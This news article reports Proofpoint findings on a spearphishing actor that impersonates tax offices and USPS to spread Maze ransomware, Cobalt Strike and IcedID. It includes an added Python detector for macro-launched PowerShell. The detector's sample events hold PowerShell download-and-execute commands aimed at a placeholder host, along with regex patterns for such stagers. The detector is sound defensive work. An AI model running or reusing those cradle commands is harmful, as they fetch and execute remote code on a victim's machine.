A new scheme has seen a nefarious actor impersonating the United States Postal Service and tax entities in recent weeks in an effort to get victims in the U.S., Italy, and Germany to download and install malware, according to new research from Proofpoint.
The scheme tries to trick victims into opening spearphishing emails whose attachments deliver ransomware, and at times banking trojans, by sending alerts that appear to require urgent action on tax information. Of course, what's really taking place is a money-making ploy, according to Proofpoint researchers.
The scheme — it’s unclear whether it’s being carried out by one person or a group — also works to trick victims by appearing to imitate government taxation entities or the USPS by using lookalike domains and branding.
In one case last month, German-based accounts were targeted with hundreds of spearphishing emails that appeared to come from the German Federal Central Tax Office (Bundeszentralamt für Steuern). The note mentioned a 2019 tax refund worth several hundred euros and urged victims to submit a refund request using an attacker-manipulated Microsoft Word document which, if opened and its macro allowed to run, would install Maze ransomware on the victim's system.
The Maze ransomware campaign, which primarily targeted information technology services companies in Germany, would encrypt victims’ files and display a ransom note demanding various amounts, sometimes in the hundreds of euros.
The actor repeated this infection chain in another campaign that impersonated the German internet service provider, 1&1 Internet AG, in hundreds of spearphishing emails early this month.
In some of the German-focused campaigns, the malicious attachment would execute a Microsoft Office macro, which in turn ran a PowerShell script to download Cobalt Strike, a commercially licensed penetration-testing and adversary-emulation framework that criminal groups have widely repurposed.
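As an added example, not code from Proofpoint, CyberScoop or the campaign itself: a small detection that flags the macro-launched PowerShell chain described above on Sysmon-style process-creation events. The log format, file paths, timestamps and the example.invalid URLs are constructed for the demo; the command-line indicators are generic download-cradle and evasion patterns, not the actor's actual macro or script. It also decodes a `-EncodedCommand` argument and rescans the decoded text, which is how this kind of stager usually hides its download cradle.

```python
"""Added example (not code from Proofpoint, CyberScoop or the actor): flag the
Office-macro -> PowerShell -> download-cradle chain on Sysmon-style process
creation events.  Event lines, paths and URLs are constructed for the demo."""
import base64
import binascii
import re
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Command-line indicators typical of a macro-launched PowerShell stager.
INDICATORS = [
    ("download-cradle", re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer", re.I)),
    ("encoded-command", re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("evasion-flags", re.compile(
        r"-nop\b|-noprofile\b|-w(?:indowstyle)?\s+hidden|-ep\s+bypass|-executionpolicy\s+bypass", re.I)),
    ("in-memory-exec", re.compile(r"\biex\b|invoke-expression", re.I)),
]
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)

# Constructed log format: "<ts> ParentImage=...|Image=...|CommandLine=..."
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+ParentImage=(?P<parent>[^|]+)\|Image=(?P<image>[^|]+)\|CommandLine=(?P<cmd>.*)$")


@dataclass
class ProcEvent:
    timestamp: str
    parent_image: str
    image: str
    command_line: str


@dataclass
class Alert:
    event: ProcEvent
    reasons: list


def parse_event(line):
    """Parse one constructed log line; return None for lines that don't fit."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return ProcEvent(m["ts"], m["parent"].strip(), m["image"].strip(), m["cmd"].strip())


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].strip('"').lower()


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or '' if absent or invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="ignore")
    except (binascii.Error, ValueError):
        return ""


def score_event(ev):
    """Collect reasons: Office parent spawning a script host, plus indicators
    found on the raw command line and (prefixed 'decoded:') in its -enc payload."""
    reasons = []
    parent, child = basename(ev.parent_image), basename(ev.image)
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        reasons.append(f"office-spawned-{child}")
    for label, pat in INDICATORS:
        if pat.search(ev.command_line):
            reasons.append(label)
    decoded = decode_encoded_command(ev.command_line)
    for label, pat in INDICATORS:
        if decoded and pat.search(decoded):
            reasons.append(f"decoded:{label}")
    return reasons


def detect(lines, min_indicators=2):
    """Alert on any Office -> script-host spawn, or on >= min_indicators hits."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        reasons = score_event(ev)
        office_chain = any(r.startswith("office-spawned-") for r in reasons)
        if office_chain or len(reasons) >= min_indicators:
            alerts.append(Alert(ev, reasons))
    return alerts


def _ps_encode(script):
    # What PowerShell expects for -EncodedCommand: UTF-16LE text, base64-encoded.
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample events (hypothetical paths, timestamps and URLs).
ENCODED_STAGER = _ps_encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/b')")
SAMPLE_EVENTS = [
    r"2019-11-05T09:11:58Z ParentImage=C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE|Image=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|CommandLine=WINWORD.EXE /n C:\Users\alice\Downloads\Steuererstattung_2019.doc",
    r"""2019-11-05T09:12:44Z ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -nop -w hidden -c "IEX ((New-Object Net.WebClient).DownloadString('http://example.invalid/a'))" """,
    r"2019-11-05T09:15:02Z ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe Get-ChildItem C:\Users\alice\Documents",
    rf"2019-11-05T09:20:31Z ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -NoProfile -EncodedCommand {ENCODED_STAGER}",
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a.event.timestamp, basename(a.event.parent_image), "->",
              basename(a.event.image), a.reasons)
```

Outlook handing the attachment to Word (the first event) and an analyst's interactive PowerShell (the third) produce no alert; Word spawning PowerShell fires on the parent-child pair alone, because that pairing is almost never legitimate, and the encoded stager fires on its flags plus what the decoded payload contains.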
Germany's IT sector is not alone: the actor launched a similar spearphishing operation using malicious Microsoft Word documents against Italian entities in late October. This time, the group sent victims a fake alert impersonating the Italian Revenue Agency (Agenzia delle Entrate), prompting them to read an attached document to avoid tax penalties.
The ultimate goal of this spearphishing campaign, which targeted entities in the manufacturing sector, was once again to get victims to install Maze ransomware.
Just this Tuesday the actor expanded its scheme to include U.S. targets, according to Proofpoint. The attackers sent thousands of emails to entities in the healthcare sector with a fake unsuccessful-delivery notice from USPS. Instead of ransomware, this time the attackers are trying to lure victims into installing the banking trojan known as IcedID.
Russian language evidence
Although it was not immediately clear to researchers who is behind the schemes, Proofpoint Threat Intelligence Lead Christopher Dawson told CyberScoop there are some clues in the attackers’ infrastructure.
“There is some evidence based on observed infrastructure that the actor is Russian-speaking,” Dawson said.
Other clues may lie in the payloads being used.
APT32, a group that typically targets companies with business interests in Vietnam, has used Cobalt Strike in the past, for instance. Also known as OceanLotus, the group primarily targets victims in the manufacturing and hospitality sectors, much like this new cybercriminal group.
APT19, a group that has been linked to the Chinese government and also tends to target the manufacturing sector, and Cobalt Group, which targets financial entities, have likewise used Cobalt Strike in the past. Cobalt Strike is widely available, though, so shared tooling alone says little about who is behind a campaign.
For now, however, there is no evidence that any of these groups is behind this scheme, Dawson said.
“Based on a number of characteristics and TTPs including sending infrastructure, lure styles, macro code, and more, we have not uncovered any overlap with those of existing actors,” Dawson told CyberScoop.
Although Proofpoint would not disclose how many companies in total have been targeted in this scheme so far, Dawson noted in a statement that the campaigns “are significant … for their relatively rapid expansion across multiple geographies.” Proofpoint said it will continue to monitor for campaigns from the new cybercriminal actor.